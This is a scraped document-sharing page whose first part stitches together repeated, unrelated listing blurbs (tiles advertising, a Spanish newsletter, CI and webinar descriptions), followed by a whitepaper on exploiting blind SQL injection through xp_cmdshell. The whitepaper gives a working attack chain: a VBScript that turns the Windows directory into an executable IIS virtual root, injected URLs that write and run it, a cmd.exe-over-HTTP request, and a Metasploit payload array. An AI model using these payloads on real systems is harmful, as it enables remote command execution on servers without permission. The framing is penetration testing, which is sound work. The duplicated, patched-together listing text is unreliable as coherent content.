The practice of web application penetration testing_U2_
The practice of web application penetration testing.
How to build test environment, how to use brute force tool, how to execute SQL Injection, Cross site Scripting etc.
2009 Barcamp Nashville Web Security 101brian_dailey
A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here:
http://www.ustream.tv/recorded/2369801
The practice of web application penetration testing_U2_
The practice of web application penetration testing.
How to build test environment, how to use brute force tool, how to execute SQL Injection, Cross site Scripting etc.
2009 Barcamp Nashville Web Security 101brian_dailey
A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here:
http://www.ustream.tv/recorded/2369801
We are engaged in manufacturing, supplying and exporting of a wide range of Glossy Digital Tiles, Kitchen Ware Tiles and Silk Matt Digital Tiles. These tiles are demanded for smooth and attractive designs.
Boletín de noticias RIET N° 5 – Octubre 2015RIET_INEW
Continuamos uniendo caminos trazados en la formación profesional. Esta vez es el turno de dos instituciones ubicadas en Uganda y Málaga que se adhirieron a la RIET en el último mes. Una de ellas es IPF (Iniciativas de Proyectos de Formación), una institución española con 10 años de experiencia en oferta de servicios de formación y consultoría a particulares, pero también a organizaciones a nivel nacional e internacional.
http://riet-edu.org/
This tutor explains a solution to attach a console to your app. Basically we want an app to have two modes, a GUI mode and a non-GUI mode for any humans and robots. A NoGUI app provides a mechanism for storage and retrieval of data and functions in means other than the normal GUI used in operating systems.
sfdx continuous Integration with Jenkins on aws (Part I)Jérémy Vial
Sfdx is now an essential tool to set up in salesforce projects. It is used to ease the development of LWC and also to facilitate the continuous delivery of the code and its versioning.
With the experience gained on my latest projects in SFDX release management, I made a small guide for setting up a simple continuous delivery system in the frame of an sfdx project.
We are engaged in manufacturing, supplying and exporting of a wide range of Glossy Digital Tiles, Kitchen Ware Tiles and Silk Matt Digital Tiles. These tiles are demanded for smooth and attractive designs.
Boletín de noticias RIET N° 5 – Octubre 2015RIET_INEW
Continuamos uniendo caminos trazados en la formación profesional. Esta vez es el turno de dos instituciones ubicadas en Uganda y Málaga que se adhirieron a la RIET en el último mes. Una de ellas es IPF (Iniciativas de Proyectos de Formación), una institución española con 10 años de experiencia en oferta de servicios de formación y consultoría a particulares, pero también a organizaciones a nivel nacional e internacional.
http://riet-edu.org/
This tutor explains a solution to attach a console to your app. Basically we want an app to have two modes, a GUI mode and a non-GUI mode for any humans and robots. A NoGUI app provides a mechanism for storage and retrieval of data and functions in means other than the normal GUI used in operating systems.
sfdx continuous Integration with Jenkins on aws (Part I)Jérémy Vial
Sfdx is now an essential tool to set up in salesforce projects. It is used to ease the development of LWC and also to facilitate the continuous delivery of the code and its versioning.
With the experience gained on my latest projects in SFDX release management, I made a small guide for setting up a simple continuous delivery system in the frame of an sfdx project.
OSCP Exam Preparation Documents.
In This document, we download one vulnerable machine VM image and start analysis on the machine and get root privileged.
Drupal Continuous Integration with Jenkins - DeployJohn Smith
Simple deployment setup for Jenkins. This tutorial assumes you have used our previously released "Drupal Continuous Integration with Jenkins" tutorial to setup your Jenkins server. This document is being released under the Creative Commons CC0 license.
Enjoy!
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Blindsql
1. 1 Blueinfy’s whitepaper series
Blind SQL injection discovery & exploitation technique
by Shreeraj Shah
Abstract
This paper describes technique to deal with blind SQL injection spot with ASP/ASP.NET
applications running with access to XP_CMDSHELL. It is possible to perform pen test
against this scenario though not having any kind of reverse access or display of error
message. It can be used in completely blind environment and successful execution can
grant remote command execution on the target application with admin privileges.
Keywords
Blind SQL injection, SQL injection, XP_CMDSHELL
Author
Shreeraj Shah, Founder & Director, Blueinfy Solutions Pvt. Ltd.
Email : shreeraj@blueinfy.com
Blog : http://shreeraj.blogspot.com
Profile : http://www.linkedin.com/in/shreeraj
http://www.blueinfy.com
2. 2 Blueinfy’s whitepaper series
Problem Domain:
While performing web application and penetration testing following scenario is very
common and it hides potential exploitable SQL injection scenario:
1. We have SQL injection point but it is not throwing any error message out as part
of its response. Application is sending customized error page which is not
revealing any signature by which we can deduce potential SQL flaw.
2. Knowing SQL injection point or loophole in web application, xp_cmdshell seems
to be working. But we can’t say is it working or not since it doesn’t return any
meaningful signature. This is “blind xp_cmdshell”.
3. Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to
the Internet by which you can confirm execution of the command on the target
system.
4. We don’t know the actual path to webroot so can’t copy file to location which can
be accessed over HTTP or HTTPS later to confirm the execution of the command.
5. If we know path to webroot and directory structure but can’t find execute
permission on it so can’t copy cmd.exe or any other binary and execute over
HTTP/HTTPS.
Hence, it is becoming difficult to deal with this kind of situation and identify blind SQL
injection spot. Let’s see one of the ways by which you can reach to cmd.exe and bring it
out to the web and access over HTTP/HTTPS. This way you can confirm the existence of
vulnerability on the target application.
Solution:
Here is a solution or test one can perform during penetration testing and check the
existence of blind “xp_cmdshell”.
Step 1:
One can echo following lines to file and store it to a filesystem for example say
secret.vbs using xp_cmdshell interface.
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo
In this particular script we are identifying windir on the fly and setup a virtual root on it
with exec permission. We are mapping windows directory and map it to virtual root
“secret”, setting execute access on it as well. Following list of commands will create file
3. 3 Blueinfy’s whitepaper series
on the server. Here is a way by which we can create file line by line and then execute
script on the target machine as well.
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell =
WScript.CreateObject("WScript.Shell") > c:secret.vbs’
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo
>> c:secret.vbs’
Step 2:
Run this file using xp_cmdshell by following command.
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
This will run file and create /secret/ virtual root on the server.
Step 3:
Run command over HTTP/HTTPS
http://target/secret/system32/cmd.exe?+/c+set
Now we have full access to system32 binaries with execution privileges. Here what you
get as output.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
ALLUSERSPROFILE=C:Documents and SettingsAll Users
CommonProgramFiles=C:Program FilesCommon Files
COMPUTERNAME=BLUESQUARE
ComSpec=C:WINNTsystem32cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTPS=off
HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=
0.9,text/plain;q=0.8,image/png,*/*;q=0.5
HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_CONNECTION=keep-alive
HTTP_HOST=localhost
HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US;
rv:1.7.3) Gecko/20040910
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_KEEP_ALIVE=300
INCLUDE=C:Program FilesMicrosoft Visual Studio
.NETFrameworkSDKinclude
INSTANCE_ID=1
LIB=C:Program FilesMicrosoft Visual Studio .NETFrameworkSDKLib
LOCAL_ADDR=127.0.0.1
NUMBER_OF_PROCES
4. 4 Blueinfy’s whitepaper series
It is possible to integrate into any of the exploit framework as well. For example here is
we are putting it into Metasploit:
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $path = $self->GetVar('RPATH');
my $vhost = $self->GetVar('VHOST');
my @url = split(/#/, $path);
my @payload =
("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'",
"EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'"
);
$self->PrintLine("[+] Sending SQL injection payload...");
for(my $count=0;$count<=6;$count++)
..
..
Once we execute it we get following sort of output.
Conclusion:
The technique described in this paper can help in testing blind SQL injection running
with blind xp_cmdshell. It is easy to send few requests and check whether we are getting
execution rights on the target application or not, even application is totally blind as
described in problem domain.
